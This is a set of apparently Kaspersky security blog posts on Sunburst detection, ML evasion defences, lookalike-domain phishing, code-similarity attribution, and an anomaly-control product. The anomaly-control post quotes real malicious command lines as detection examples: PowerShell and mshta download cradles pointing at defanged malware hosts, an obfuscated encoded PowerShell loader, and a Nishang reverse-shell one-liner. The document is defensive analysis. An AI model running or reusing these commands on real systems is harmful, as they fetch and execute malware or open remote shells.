The other approach proposes the use of monotonic networks (see “Monotonic Networks” and “Monotonic models for real-time dynamic malware detection“). The principle behind this method is to create a neural network with positive layer weights and monotonic activation functions. Such models will, by design, be resistant to the addition of new sections and strings, and any addition will simply increase the model detection score, making the attack described in this article impracticable.
Adversarial attack difficulties in the real world
Currently, there is no approach in the field of machine learning that can protect against all the various adversarial attacks, meaning methods that rely heavily on ML predictions are vulnerable. Kaspersky’s anti-malware solution provides a complex multi-layered approach. It contains not only machine learning techniques but a number of different components and technologies to detect malicious files. First, detection relies on different types of features: static, dynamic or even cloud statistics. Complex detection rules and diverse machine learning models are also used to improve the quality of our products. Finally, complex and ambiguous cases go to the virus analysts for further investigation. Thus, confusion in the machine learning model will not, by itself, lead to misclassification of malware for our products. Nevertheless, we continue to conduct research to protect our ML models from existing and prospective attacks and vulnerabilities.
[i] Goodfellow, Ian J., Jonathon Shlens, and Christian Szegedy. “Explaining and harnessing adversarial examples.” arXiv preprint arXiv:1412.6572 (2014).
[ii] Brown, Tom B., et al. “Adversarial patch.” arXiv preprint arXiv:1712.09665 (2017).
[iii] Demetrio, Luca, et al. “Functionality-preserving black-box optimization of adversarial windows malware.” IEEE Transactions on Information Forensics and Security (2021).
[iv] Sharif, Mahmood, et al. “Optimization-guided binary diversification to mislead neural networks for malware detection.” arXiv preprint arXiv:1912.09064 (2019).
[v] Kolosnjaji, Bojan, et al. “Adversarial malware binaries: Evading deep learning for malware detection in executables.” 2018 26th European signal processing conference (EUSIPCO). IEEE, 2018;
Kreuk, Felix, et al. “Deceiving end-to-end deep learning malware detectors using adversarial examples.” arXiv preprint arXiv:1802.04528 (2018).
[vi] Park, Daniel, and Bülent Yener. “A survey on practical adversarial examples for malware classifiers.” arXiv preprint arXiv:2011.05973 (2020).
[vii] Liu, Yanpei, et al. “Delving into transferable adversarial examples and black-box attacks.” arXiv preprint arXiv:1611.02770 (2016).
Tramèr, Florian, et al. “The space of transferable adversarial examples.” arXiv preprint arXiv:1704.03453 (2017).
[viii] Chen, Hongge, et al. “Robust decision trees against adversarial examples.” International Conference on Machine Learning. PMLR, 2019.
Zhang, Chong, Huan Zhang, and Cho-Jui Hsieh. “An efficient adversarial attack for tree ensembles.” arXiv preprint arXiv:2010.11598 (2020).

How we protect our users against the Sunburst backdoor

Kaspersky — Wed, 23 Dec 2020 11:30:52 +0000

What happened

SolarWinds, a well-known IT managed services provider, has recently become a victim of a cyberattack. Their product Orion Platform, a solution for monitoring and managing their customers’ IT infrastructure, was compromised by threat actors. This resulted in the deployment of a custom Sunburst backdoor on the networks of more than 18,000 SolarWinds customers, with many large corporations and government entities among the victims.

According to our Threat Intelligence data, the victims of this sophisticated supply-chain attack were located all around the globe: the Americas, Europe, Middle East, Africa and Asia.

After the initial compromise, the attackers appear to have chosen the most valuable targets among their victims. The companies that appeared to be of special interest to the malicious actors may have been subjected to deployment of additional persistent malware.

Overall, the evidence available to date suggests that the SolarWinds supply-chain attack was designed in a professional manner. The perpetrators behind the attack made it a priority to stay undetected for as long as possible: after the installation, the Sunburst malware lies dormant for an extended period of time, keeping a low profile and thwarting automated sandbox-type analysis and detection. Additionally, the backdoor utilizes a sophisticated scheme for victim reporting, validation and upgrading which resembles methods involved in some other notorious supply-chain attacks.

Read more about our research on Sunburst malware here. Additional reports and indicators of compromise are available to our Threat Intelligence Portal customers.

How to protect your organization against this threat

The detection logic has been improved in all our solutions to ensure that our customers remain protected. We continue to investigate this attack using our Threat Intelligence and we will add additional detection logic once they are required.

Our products protect against this threat and detect it with the following names:

Backdoor.MSIL.Sunburst.a
Backdoor.MSIL.Sunburst.b
HEUR:Trojan.MSIL.Sunburst.gen
HEUR:Backdoor.MSIL.Sunburst.gen
Backdoor.MSIL.Sunburst.b

Screenshot of our TIP portal with one IoCs from the SolarWinds breach

Our Behavior Detection component detects activity of the trojanized library as PDM:Trojan.Win32.Generic.

Our Endpoint Detection and Response (Expert) platform can be helpful in looking for and identifying traces of this attack. The customer can search for Indicators of Compromise (such as hashes or domain names) with an .ioc file or directly with the Threat Hunting interface:

Or, customers can use the IoA Tag, which we have added specifically for this attack:

This rule marks endpoint detections for Sunburst to make it more clearly visible to security officers:

Our Kaspersky Anti-Targeted Attack Platform detects Sunburst traffic with a set of IDS rules with the following verdicts:

Trojan.Sunburst.HTTP.C&C
Backdoor.Sunburst.SSL.C&C
Backdoor.Sunburst.HTTP.C&C
Backdoor.Sunburst.UDP.C&C
Backdoor.Beacon.SSL.C&C
Backdoor.Beacon.HTTP.C&C
Backdoor.Beacon.UDP.C&C

Our Managed Detection and Response service is also able to identify and stop this attack by using threat hunting rules to spot various activities that can be performed by the Sunburst backdoor as well as detections from Kaspersky Endpoint Security.

Sunburst / UNC2452 / DarkHalo FAQ

Who is behind this attack? I read that some people say APT29/Dukes?
At the moment, there are no technical links with previous attacks, so it may be an entirely new actor, or a previously known one that evolved their TTPs and opsec to the point where they can’t be linked anymore. Volexity, who previously worked on other incidents related to this, named the actor DarkHalo. FireEye named them “UNC2452”, suggesting an unknown actor. While some media sources linked this with APT29/Dukes, this appears to be either speculation or based on some other, unavailable data, or weak TTPs such as legitimate domain re-use.
I use Orion IT! Was I a target of this attack?
First of all, we recommend scanning your system with an updated security suite, capable of detecting the compromised packages from SolarWinds. Check your network traffic for all the publicly known IOCs – see https://github.com/fireeye/sunburst_countermeasures. The fact that someone downloaded the trojanized packages doesn’t also mean they were selected as a target of interest and received further malware, or suffered data exfiltration. It would appear, based on our observations and common sense, that only a handful of the 18,000 Orion IT customers were flagged by the attackers as interesting as were further exploited.
Was this just espionage or did you observe destructive activities, such as ransomware?
While the vast majority of the high-profile incidents nowadays include ransomware or some sort of destructive payload (see NotPetya, Wannacry) in this case, it would appear the main goal was espionage. The attackers showed a deep understanding and knowledge of Office365, Azure, Exchange, Powershell and leveraged it in many creative ways to constantly monitor and extract e-mails from their true victims’ systems.
How many victims have been identified?
Several publicly available data sets, such as the one from John Bambenek, include DNS requests encoding the victim names. It should be noted that these victim names are just the “first stage” recipients, not necessarily the ones the attackers deemed interesting. For instance, out of the ~100 Kaspersky users with the trojanized package, it would appear that none were interesting to the attackers to receive the 2nd stage of the attack.
What are the most affected countries?
To date, we observed users with the trojanized Orion IT package in 17 countries. However, the total number is likely to be larger, considering the official numbers from SolarWinds.
Why are you calling this an attack, when it’s just exploitation? (CNA vs CNE)
Sorry for the terminology, we simply refer to it as a “supply chain attack”. It would be odd to describe it as a “supply chain exploitation”.
Out of the 18,000 first stage victims, how many were interesting to the attackers?
This is difficult to estimate, mostly because of the lack of visibility and because the attackers were really careful in hiding their traces. Based on the CNAME records published by FireEye, we identified only two entities, a US government organization and a telecommunications company, who were tagged and “promoted” to dedicated C2s for additional exploitation.
Why didn’t you catch this supply chain attack in the first place?
That’s a good question! In particular, two things made it really stealthy. The slow communication method, in which the malware lies dormant for up to two weeks, is one of them. The other one is the lack of x86 shellcode; the attackers used a .NET injected module. Last but not least, there was no significant change in the file size of the module when the malicious code was added. We observed two suspicious modules in 2019, which jumped from the usual 500k to 900k for SolarWinds.Orion.Core.BusinessLayer.dll. When the malicious code was first added, in February 2020, the file didn’t change size in a significant manner. If the attackers did this on purpose, to avoid future detections, then it’s a pretty impressive thing.
What is Teardrop?
According to FireEye, Teardrop is malware delivered by the attackers to some of the victims. It is an unknown memory-only dropper suspected to deliver a customized version of the well-known CobaltStrike BEACON. To date, we haven’t detected any Teardrop samples anywhere.
What made this such a successful operation?
Probably, a combination of things – a supply chain attack, coupled with a very well thought first stage implant, careful victim selection strategies and last but not least, no obvious connections to any previously observed TTPs.

Adaptive protection against invisible threats

Oleg Zaitsev, Rodion Gadyrshin, Evgeny Lopatin — Mon, 14 Dec 2020 12:00:59 +0000

Corporate endpoint security technologies for mid-sized companies struggle to surprise us with anything brand new. They provide reliable protection against malware and, when combined with relevant policies, regular updates, and employee cyberhygiene, they can shield a business from a majority of cyber-risks. For some, it may seem like you do not need more security than this… But is that really the case?

The answer, in short, is no. In fact, in most medium-sized companies’ cybersecurity strategies, even with an endpoint solution, there are likely to still be gaps that can and should be closed. In this article, we look at what those gaps are and how to fill them.

Legitimate software can hide risks

Detecting an exploit or trojan that explicitly runs on a device is not a problem for an antivirus solution. But when a malicious script is launched through a legitimate application, this can be a challenge. For example, when a phishing email document is opened in Microsoft Office, all actions will be performed by the office application.

Such authorized software is often used on a large number of devices, and it is not feasible to simply ban access to it. Antivirus solutions will also recognize these files as “trusted”, so may be unable to quickly “understand” that the piece of office software is executing atypical processes initiated by malicious code. Moreover, such activity can sometimes be started by administrators themselves as part of system maintenance. For example, the “trusted” Windows Management Engine on a remote machine can be used for deployment purposes. This further complicates the threat detection process.

What it can lead to: fileless malware, insider threats, miners and ransomware

Downloaders are one type of malware that uses this legitimate software cover. It does not itself perform any direct malicious actions on the device. Instead, it gets to the machine, for example, through a phishing email, and then independently downloads the real malicious code onto it.

There is a specific type of malware – fileless malware – that is often used as a downloader. It does not store itself on the hard disk, therefore tracking it with an ordinary antivirus solution is not easy. Because of that, fileless malware is often used in advanced targeted attacks, such as Platinum APT, whose victims were state and diplomatic organizations. Another example is the advanced PowerGhost cryptominer, which used trusted software for cryptocurrency mining. According to Kaspersky statistics, of all the anomalous activity detected in legitimate Windows Management Instrumentation processes (WMI), two-thirds (67%) were fileless downloaders of the Emotet banking trojan and the WannMine cryptominer. WMI on remote machines is often used by malware for lateral movement.

Malware families running in WMI (download)

Now, some might think that simply tightening policies and scaling down user privileges is the way to stop the malware from starting any process on the device. However, this is not an option, because fileless malware does not need administrator privileges to perform its malicious actions.

Another possible risk of authorized software exploitation occurs when malicious activity is initiated by someone on the network. If the company is lucky, it is just an employee who decided to mine coins using the corporate computing power. But in this case, since the actions are performed by a trusted user, administrators or a security solution may not be able to detect them.

Finally, some forms of malware can use legitimate processes to disguise themselves (svchost.exe, for example), which makes them more difficult to detect manually by IT security teams.

What can help? You need Little Red Riding Hood 2.0, who detects the wolf through external signs and calls lumberjacks before being eaten

To eliminate these threats, IT security teams need technology that allows them to detect any suspicious application activity from a corporate cybersecurity perspective. Spotting anomalies in trusted software helps to identify threats at the very early stages, when the malware is already on the device but before the antivirus reacts to it. This technology, developed by Kaspersky, is called Adaptive Anomaly Control.

To make anomaly detection work, several problems need to be solved. First, how does Adaptive Anomaly Control know which activity is abnormal and which is not? Secondly, if the control notifies an administrator about each deviation, many of the notifications will most likely turn out to be just false positives for scripts launched as part of a workflow. In that situation, the user will immediately want to disable the control.

To resolve that, the technology should first be “trained” to recognize how applications work and what actions are performed regularly by employees as part of their job responsibilities. This minimizes the number of false positives and keeps administrators from going crazy. And, most importantly, if Adaptive Anomaly Control notifies the IT security manager about suspicious activity to ensure they understand when action needs to be taken immediately. Thus, the technology will turn from “the boy who kept crying wolf” into an advanced version of Little Red Riding Hood, who manages to recognize the wolf in the guise of her grandmother early on and call the lumberjacks for help before she gets eaten.

How Adaptive Anomaly Control works

Adaptive Anomaly Control works on the basis of rules, statistics and exceptions. Rules cover three groups of programs: office programs, Windows Management Instrumentation, and script engines and frameworks, as well as the abnormal program activity category. The rules are already developed in the product, so there is no need to write them manually.

List of rules for office applications

To start with, Adaptive Anomaly Control has training mode activated for about two weeks. During this time, it monitors the network and collects statistics on application usage. Technically, Adaptive Anomaly Control mostly analyzes process creation actions. For example, the command line code of a new process, file path and name of executable, and also the calling stack can be analyzed to determine an anomaly. The technology marks regular anomalies, which indicate that processes are started by employees for work purposes. Based on the data received, it then sets exceptions to the rules. If administrators use scripts that could potentially trigger the rules, they can create exceptions before turning on the component, which will improve the quality of the training process.

The training period avoids false positives, but it also helps to catch important anomalies. If a false positive occurs within a rule, administrators can choose not to block the entire network with the exception, but instead configure it for just the particular script that triggered the rule. This mitigates the risk of throwing a global exception that makes the component useless.

The policies can be tuned for different groups of users individually and inherited as part of user profiles. For example, financial department employees would never legitimately need to execute JavaScript, but the development team will. Therefore, for the software development department, some rules may be disabled or provided with numerous exceptions, while for the financial department, they may be turned on. Adaptive Anomaly Control identifies the user group in which the rule is triggered to block or allow execution accordingly.

Adding an exclusion for a user or group

After the training period, when Adaptive Anomaly Control enters combat mode, the component notifies the IT security manager about any anomalies outside of the exceptions specified during the training period. It provides information for investigation, such as what processes triggered the operations, on what computers and under what users.

Example of anomalous activity by Microsoft Word and possible actions

For example, a PowerShell script trying to start a Windows Command Processor, HTML Application Host, or Register Server from office software may be considered suspicious. Launching these activities is technically possible but not typical of regular operation. Let us focus on some real-life examples which Adaptive Anomality Control component detects. Fin7 spear phishing campaigns have included malicious Word documents with DDE execution of PowerShell code, which were detected and blocked (doc MD5: 2C0CFDC5B5653CB3E8B0F8EEEF55FC32).

Fin7 document with DDE execution

Command-line code from inside a document:

powershell  -C ;echo "https://sec[.]gov/";IEX((new-object net.webclient).downloadstring('https[:]//trt.doe.louisiana[.]gov/fonts.txt'))

Another example is the LockiBot’s downloader, which was also started from within office software (doc MD5: 2151D178B6C849E4DDB08E5016A38A9A):

mshta http[:]//%20%20@j[.]mp/asdaaskdasdjijasdiodkaos

Adaptive Anomality Control also detects suspicious drop attempts by office applications. For example, a Qbot document-dropped payload was detected: C:\Arunes\caemyuta\Polaser.exe (doc MD5: 3823617AB2599270A5D10B1331D775FE). Another example of a detected dropper is this Cymulate Framework document activity: %tmp% \c0de203103ce5f0a5463e324c1863eb1_CymulateNativeReverseShell.exe (exe MD5: D8DBF8C20E8EA57796008D0F59104042).

Similarly, with Windows Management Instrumentation, Adaptive Anomaly Control may react if HTML Application Host or a PowerShell script is launched from WMI. In addition, according to Kaspersky research, most malicious activity (62%) is detected in the WMI group. WMI is a common tool among malware developers because of its convenience. It allows for easy starting of PowerShell code and performs a wide range of actions, such as system intelligence collection.

The number of unique users attacked, by detection group (download)

For example, the Silent Break Security framework was detected during lateral movement using WMI, which ran this inline PowerShell code:

powershell -NoP -NonI -W Hidden -C "$pnm='57wXU7nxLgCRzFJ1q';$enk='cX6MKM670IO+B5YCcnL8RWbc27WOIIdNxhq45TAcCdI=';sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('vTxt......yULif/Pj/'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()"

Such cryptominers as WannaMine and KingMiner also use WMI for spreading across networks. Below, you can see their command-line code that triggered detection:

powershell.exe -NoP -NonI -W Hidden "if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64')){IEX(New-Object Net.WebClient).DownloadString('http[:]//safe.dashabi[.]nl:80/networks.ps1')}else{IEX(New-Object Net.WebClient).DownloadString('http[:]//safe.dashabi[.]nl:80/netstat.ps1')}"

mshta.exe vbscript:GetObject("script:http[:]//165233.1eaba4fdae[.]com/r1.txt")(window.close)

In the group of script engines and frameworks, activities such as running dynamic or obfuscated code may be suspicious. For example, LemonDuck’s fileless downloader was detected during lateral movement:

IEX(New-Object Net.WebClient).DownloadString('http[:]//t.amynx[.]com/gim.jsp')

Originally, it was a base64-encoded inline PowerShell script. The decoded version is shown here for convenience.

Another example in the group of script engines is Clipbanker’s scheduled task command line, also originally a base64-encoded inline PowerShell script:

iex $(Get-ItemProperty -Path HKCU:\Software -Name kumi -ErrorAction Stop).kumi

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell code for offensive security, penetration testing and red teaming. An example of a detected fileless PowerShell backdoor:

$sm=(New-Object Net.Sockets.TCPClient(`XX.XX.XX.XX`,9999)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

As part of the abnormal program activity category, files with anomalous names or locations are tracked: for example, a third-party program which has the name of a system file but is not stored in the system folder. Also, suspicious files inside system directories are tracked: for example, a ShadowPad backdoor was started inside a system folder: C:\windows\debug\srv.exe (MD5: DLL-hijacking used, dll MD5: CC2F7D7CA76A5223E936570A076B39B8). Adaptive Anomaly Control detects such activity. Another detected example is a Swisyn backdoor at: C:\windows\system\explorer.exe (MD: 8E0B4BC934519400B872F9BAD8D2E9C6). The botnet Mirai also places its parts in a system folder and gets detected: C:\windows\system\backs.bat (MD5: 7F70B9755911B0CDCFC1EBC56B310B65).

A detailed log of Adaptive Anomaly Control rules applied to various user groups

“Process action blocked” notification

The Adaptive Anomaly Control algorithm shows how the decision-making process performed during the training period. If a rule was not triggered at all during training, the technology will consider the actions associated with this rule as suspicious and block them. If a rule is triggered, an administrator receives a report and decides what the technology should do: block the process or allow it and notify the user. Another option is to extend the training to monitor further the way the rule is working. If the user does not take any action, the control will also continue to work in smart training mode. The training mode time limit is then reset.

Adaptive Anomaly Control training algorithm

If this technology is so effective, then what are all the other protection features needed for?

Adaptive Anomaly Control solves the specific task of early threat detection. It does so automatically and requires no special administration skills or proactive measures. This means the technology cannot detect the malware itself, just its delivery to the network, as well as the potentially dangerous actions launched by the insider, or the malicious activity of programs that have a status of “not a virus”. It is always easier to treat the disease at an early stage, so early detection of threats helps to get rid of them faster, with less workload on the IT and information security departments.

However, it is equally important to use the entire range of protective measures including signature-based malware detection, behavioral analysis, vulnerability detection and patch management, and exploit prevention. These technologies help to bock most generic attacks, which means that advanced protection mechanisms such as Adaptive Anomaly Control are offloaded to detect the really complex evasive threats. Adaptive Anomaly Control is used for covering this specific risky area and it is effective in this role, while other endpoint technologies have to address their respective areas of expertise. This way, the complete cybersecurity solution will be efficient enough to protect the business from cyberthreats.

Lookalike domains and how to outfox them

Alan Savushkin, Nikita Benkovich — Tue, 24 Nov 2020 10:00:59 +0000

Our colleagues already delved into how cybercriminals attack companies through compromised email addresses of employees, and how to protect against such attacks using SPF, DKIM and DMARC technologies. But despite the obvious pluses of these solutions, there is a way to bypass them that we want to discuss.

But let’s start from a different angle: how relevant is email these days? After all, this year saw a sharp rise in the popularity of video-conferencing tools, preceded by several years of healthy growth in the use of instant messengers, in particular, WhatsApp and Telegram. Nevertheless, email is still the main means of online communication, at least in the business world. Indirect confirmation of this is the increase in the number and quality of Business Email Compromise (BEC) attacks. According to data from the US Internet Crime Complaint Center (IC3), the financial damage from such attacks has risen sevenfold in the past five years.

Financial damage from BEC attacks, 2015–2019 (download)

Data for 2020 has not yet been published, but given the COVID-19 pandemic and the mass shift of employees to remote working, it is safe to assume that the number of BEC attacks will only grow. Initial threat landscape studies also point to this.

Lookalike domains in BEC

A feature of BEC is the emphasis not on the technical side (cybercriminals’ options are rather limited when it comes to email), but on social engineering. Typically, attacks of this kind combine technical and social techniques to achieve greater efficiency. The three protection technologies mentioned above cope with most combinations well enough. But there is one exception: lookalike-domain attacks. The method is simple in essence: the cybercriminals register a domain that looks very similar to that of the target company or a partner firm. Messages sent from this domain sail through Sender Policy Framework (SPF) authentication, possess a DomainKeys Identified Mail (DKIM) cryptographic signature, and generally do not arouse the suspicions of security systems. The snag is that these emails are phishing. And if written believably enough — with a corporate template, stressing the urgency of the matter, etc. — they will likely fool the victim.

Here are some examples of fake domain names:

Original domain	Fake domain
netflix.com	netffix.com
kaspersky.com	kapersky.com
uralairlines.ru	uralairilnes.ru

As you can see, the fake differs from the original by only one letter added (or removed) so that a closer look is required to spot it.

For an overview of the use of fake domains, we compiled statistics on lookalike spoofing for Q3 2020. Having analyzed the data, we concluded that this year’s pandemic has significantly changed the direction of cybercriminal activity. Whereas before, the focus of such attacks was the financial sector, now the service sector is in the firing line, including various e-commerce services: food delivery, online shopping, buying air tickets, etc. Domains related to this sector accounted for 34.7% of the total number of attacks in Q3.

Distribution of detected lookalike domains by category, Q3 2020 (download)

Also note the rise in the IT sector’s share in 2020: up from 17.9% in Q1 to 22.2% in Q3. This is to be expected, since the mass transition to remote working was bound to impact the overall situation.

A word about lookalikes

Unlike spam mailings, which tend to be large in both scale and duration, attacks involving lookalike domains, like any BEC attack, target a specific victim (or group of victims). Consequently, emails are few and well thought out, and the domains are extremely short lived. We see that half of all fake domains are used only once, and in 73% of cases the domain is only active for just one day. This renders traditional signature-based anti-spam solutions (detect an attack, create a rule) effectively useless, thus the need arises for proactive protection. There are two common and at the same time simple methods available to companies keen to guard at least in some measure against lookalike and other such attacks.

The first is for the company itself to register domains with typos, and set up redirects to its official domain. This reduces cybercriminals’ ability to register a plausible fake, but does not nullify it completely or prevent counterfeiting of domains belonging to partners, contractors and other organizations which the company deals with.

The second is to compile lists of plausible fake names for both the company’s domain and those of partners and contractors. Next, the list is loaded into the anti-spam solution, which preemptively blocks all messages arriving from the fakes. The main drawback of this method is the same as before: it is impossible to cover all possible fake domains, especially if the company works with many counterparties. Plus, there is the ever-present human factor — one typo in the list of tens or hundreds of domain names can lead to a security breach or the filtering out of emails from a legitimate domain instead of a fake one, causing additional headaches for business units.

When simple solutions no longer suited our clients, they came to us for something more complex. The result was a method that requires no user interaction. In a nutshell, it automatically compiles a global list of legitimate domains that could potentially be faked, on which basis it analyzes and blocks messages from lookalike domains. In essence, it is proactive.

How it works

Protection against lookalike-domain attacks is three-pronged: client-side processing; domain reputation check in Kaspersky Security Network; infrastructure-side processing. The general principle is shown schematically below:

In practice, it goes as follows. On receiving an email, the technology forwards the sender domain to Kaspersky Security Network (KSN), which matches it against the list of lookalike domains already known to us. If the sender domain is found, the message is instantly blocked (steps 1 to 3). If there is no information about it, the email is quarantined for a short fixed period (step 4). This gives time for the technology to check the domain according to the set algorithm, and, if it recognizes it as fake, to add it to the list of lookalike domains in KSN. After the email leaves quarantine, it is rescanned (step 9) and blocked, since by then the list of lookalike domains has been updated.

Let’s take a look at how sender verification works and how the list of lookalike domains gets updated. Information about quarantined messages is sent to the KSN database together with additional metadata, including the sender domain (step 5). At the first stage of analysis, the domain undergoes a “suspiciousness” check based on a wide range of criteria, such as Whois data, DNS records, certificates, and so on; the purpose of this stage is to quickly sift out domains that are clearly legitimate, but not yet known to our system. Henceforth, emails from these domains are no longer quarantined, because KSN now has information about them. At the second stage, the system compares the similarity of suspicious domains and addresses in our global list of legitimate domains (step 7), which includes the domains of our clients and their counterparties. This list is generated automatically based on an assessment of the frequency with which legitimate messages are sent from the domain and the uniformity of the mail flow over time. The extent to which the overall picture matches the behavior of employees in terms of business correspondence determines the reputation of the domain (step 6). If the resemblance of the scammer’s domain to a legitimate address is high, the sender domain too is added to the list of lookalike domains and all messages sent from it are blocked.

Our approach is more complex than simply registering lookalike domains to the company and enables real-time blocking of attacks that use such domains as soon as they appear. In addition, the human factor is eliminated, and the global list of legitimate domains stays current thanks to automatic updates.

Looking at Big Threats Using Code Similarity. Part 1

Costin Raiu — Tue, 09 Jun 2020 10:00:37 +0000

Today, we are announcing the release of KTAE, the Kaspersky Threat Attribution Engine. This code attribution technology, developed initially for internal use by the Kaspersky Global Research and Analysis Team, is now being made available to a wider audience. You can read more about KTAE in our official press release, or go directly to its info page on the Kaspersky Enterprise site. From an internal tool, to prototype and product, this is a road which took about 3 years. We tell the story of this trip below, while throwing in a few code examples as well. However, before diving into KTAE, it’s important to talk about how it all started, on a sunny day, approximately three years ago.

May 12, 2017, a Friday, started in a very similar fashion to many other Fridays: I woke up, made coffee, showered and drove to work. As I was reading e-mails, one message from a colleague in Spain caught my attention. Its subject said “Crisis … (and more)”. Now, crisis (and more!) is not something that people appreciate on a Friday, and it wasn’t April 1st either. Going through the e-mail from my colleague, it became obvious something was going on in several companies around the world. The e-mail even had an attachment with a photo, which is now world famous:

Soon after that, Spain’s Computer Emergency Response Team CCN-CERT, posted an alert on their site about a massive ransomware attack affecting several Spanish organizations. The alert recommended the installation of updates in the Microsoft March 2017 Security Bulletin as a means of stopping the spread of the attack. Meanwhile, the National Health Service (NHS) in the U.K. also issued an alert and confirmed infections at 16 medical institutions.

As we dug into the attack, we confirmed additional infections in several additional countries, including Russia, Ukraine, and India.

Quite essential in stopping these attacks was the Kaspersky System Watcher component. The System Watcher component has the ability to rollback the changes done by ransomware in the event that a malicious sample manages to bypass other defenses. This is extremely useful in case a ransomware sample slips past defenses and attempts to encrypt the data on the disk.

As we kept analysing the attack, we started learning more things; for instance, the infection relied on a famous exploit, (codenamed “EternalBlue”), that has been made available on the internet through the Shadowbrokers dump on April 14th, 2017 and patched by Microsoft on March 14. Despite the fact the patch has been available for two months, it appeared that many companies didn’t patch. We put together a couple of blogs, updated our technical support pages and made sure all samples were detected and blocked even on systems that were vulnerable to the EternalBlue exploit.

Meanwhile, as everyone was trying to research the samples, we were scouting for any possible links to known criminal or APT groups, trying to determine how a newcomer malware was able to cause such a pandemic in just a few days. The explanation here is simple – for ransomware, it is not very often that we get to see completely new, built from scratch, pandemic-level samples. In most cases, ransomware attacks make use of some popular malware that is sold by criminals on underground forums or, “as a service”.

And yet, we couldn’t spot any links with known ransomware variants. Things became a bit clearer on Monday evening, when Neel Mehta, a researcher at Google, posted a mysterious message on Twitter with the #WannaCryptAttribution hashtag:

The cryptic message in fact referred to a similarity between two samples that have shared code. The two samples Neel refers to in the post were:

A WannaCry sample from February 2017 which looks like a very early variant
A Lazarus APT group sample from February 2015

The similarity can be observed in the screenshot below, taken between the two samples, with the shared code highlighted:

Although some people doubted the link, we immediately realized that Neel Mehta was right. We put together a blog diving into this similarity, “WannaCry and Lazarus Group – the missing link?”. The discovery of this code overlap was obviously not a random hit. For years, Google integrated the technology they acquired from Zynamics into their analysis tools making it possible to cluster together malware samples based on shared code. Obviously, the technology seemed to work rather nicely. Interestingly, one month later, an article was published suggesting the NSA also reportedly believed in this link.

Thinking about the story, the overlap between WannaCry and Lazarus, we put a plan together – what if we built a technology that can quickly identify code reuse between malware attacks and pinpoint the likely culprits in future cases? The goal would be to make this technology available in a larger fashion to assist threat hunters, SOCs and CERTs speed up incident response or malware triage. The first prototype for this new technology was available internally June 2017, and we continued to work on it, fine-tuning it, over the next months.

In principle, the problem of code similarity is relatively easy. Several approaches have been tested and discussed in the past, including:

Calculating checksums for subs and comparing them against a database
Reconstructing the code flow and creating a graph from it; comparing graphs for similar structures
Extracting n-grams and comparing them against a database
Using fuzzy hashes on the whole file or parts of it
Using metadata, such as the rich header, exports or other parts of the file; although this isn’t code similarity, it can still yield some very good results

To find the common code between two malware samples, one can, for instance, extract all 8-16 byte strings, then check for overlaps. There’s two main problems to that though:

Our malware collection is too big; if we want to do this for all the files we have, we’d need a large computing cluster (read: thousands of machines) and lots of storage (read: Petabytes)
Capex too small

Additionally, doing this massive code extraction, profiling and storage, not to mention searching, in an efficient way that we can provide as a stand-alone box, VM or appliance is another level of complexity.

To refine it, we started experimenting with code-based Yara rules. The idea was also simple and beautiful: create a Yara rule from the unique code found in a sample, then use our existing systems to scan the malware collection with that Yara rule.

Here’s one such example, inspired by WannaCry:

This innocent looking Yara rule above catches BlueNoroff (malware used in the Bangladesh Bank Heist), ManusCrypt (a more complex malware used by the Lazarus APT, also known as FALLCHILL) and Decafett, a keylogger that we previously couldn’t associate with any known APT.

A breakthrough in terms of identifying shared code came in Sep 2017, when for the first time we were able to associate a new, “unknown” malware with a known entity or set of tools. This happened during the #CCleaner incident, which was initially spotted by Morphisec and Cisco Talos.

In particular, our technology spotted a fragment of code, part of a custom base64 encoding subroutine, in the Cbkrdr shellcode loader that was identical to one seen in a previous malware sample named Missl, allegedly used by APT17:

Digging deeper, we identified at least three malware families that shared this code: Missl, Zoxpng/Gresim and Hikit, as shown below in the Yara hits:

In particular, the hits above are the results of running a custom Yara rule, based on what we call “genotypes” – unique fragments of code, extracted from a malware sample, that do not appear in any clean sample and are specific to that malware family (as opposed to being a known piece of library code, such as zlib for instance).

As a side note, Kris McConkey from PwC delivered a wonderful dive into Axiom’s tools during his talk “Following APT OpSec failures” at SAS 2015 – highly recommended if you’re interested in learning more about this APT super-group.

Soon, the Kaspersky Threat Attribution Engine – “KTAE” – also nicknamed internally “Yana”, became one of the most important tools in our analysis cycle.

Digging deeper, or more case studies

The United States Cyber Command, or in short, “USCYBERCOM”, began posting samples to VirusTotal in November 2018, an excellent move in our opinion. The only drawback for these uploads was the lack of any context, such as the malware family, if it’s APT or criminal, which group uses them and whether they were found in the wild, or scooped from certain places. Although the first upload, a repurposed Absolute Computrace loader, wasn’t much of an issue to recognize, an upload from May 2019 was a bit more tricky to identify. This was immediately flagged as Sofacy by our technology, in particular, as similar to known XTunnel samples, a backdoor used by the group. Here’s how the KTAE report looks like for the sample in question:

Analysis for d51d485f98810ab1278df4e41b692761

In February 2020, USCYBERCOM posted another batch of samples that we quickly checked with KTAE. The results indicated a pack of different malware families, used by several APT groups, including Lazarus, with their BlueNoroff subgroup, Andariel, HollyCheng, with shared code fragments stretching back to the DarkSeoul attack, Operation Blockbuster and the SPE Hack.

Going further, USCYBERCOM posted another batch of samples in May 2020, for which KTAE revealed a similar pattern.

Of course, one might wonder, what else can KTAE do except help with the identification of VT dumps from USCYBERCOM?

For a more practical check, we looked at the samples from the 2018 SingHealth data breach that, according to Wikipedia, was initiated by unidentified state actors. Although most samples used in the attack are rather custom and do not show any similarity with previous attacks, two of them have rather interesting links:

KTAE analysis for two samples used in the SingHealth data breach

Mofang, a suspected Chinese-speaking threat actor, was described in more detail in 2016 by this FOX-IT research paper, written by Yonathan Klijnsma and his colleagues. Interestingly, the paper also mentioned Singapore as a suspected country where this actor is active. Although the similarity is extremely weak, 4% and 1% respectively, they can easily point the investigator in the right direction for more investigation.

